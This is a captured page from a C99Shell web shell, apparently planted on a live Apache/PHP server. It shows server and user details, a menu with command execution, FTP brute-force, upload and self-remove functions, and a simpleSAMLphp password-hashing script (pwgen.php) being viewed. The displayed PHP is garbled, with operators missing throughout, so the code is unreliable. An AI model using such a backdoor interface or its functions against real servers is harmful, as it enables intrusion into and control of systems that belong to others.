!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/bin/   drwxrwxr-x
Free 14.38 GB of 61.93 GB (23.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pwgen.php (1.05 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/env php
<?php
/*
 * $Id$
 * Interactive script to generate password hashes.
 *
 */


/* This is the base directory of the simpleSAMLphp installation. */
$baseDir dirname(dirname(__FILE__));

/* Add library autoloader. */
require_once($baseDir '/lib/_autoload.php');


echo 
"Enter password: ";
$password trim(fgets(STDIN));

if(empty(
$password)) {
    echo 
"Need at least one character for a password\n";
    exit(
1);
}

$table '';
foreach (
array_chunk(hash_algos(), 6) as $chunk) {
    foreach(
$chunk as $algo) {
        
$table .= sprintf('%-13s'$algo);
    }
    
$table .= "\n";
}

echo 
"The following hashing algorithms are available:\n" $table "\n";
echo 
"Which one do you want? [sha256] ";
$algo trim(fgets(STDIN));
if(empty(
$algo)) {
    
$algo 'sha256';
}

if(!
in_array(strtolower($algo), hash_algos())) {
    echo 
"Hashing algorithm '$algo' is not supported\n";
    exit(
1);
}

echo 
"Do you want to use a salt? (yes/no) [yes] ";
$s = (trim(fgets(STDIN)) == 'no') ? '' 'S';

echo 
"\n  " SimpleSAML_Utils_Crypto::pwHash($passwordstrtoupper$s $algo ) ). "\n\n";

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.9789 ]--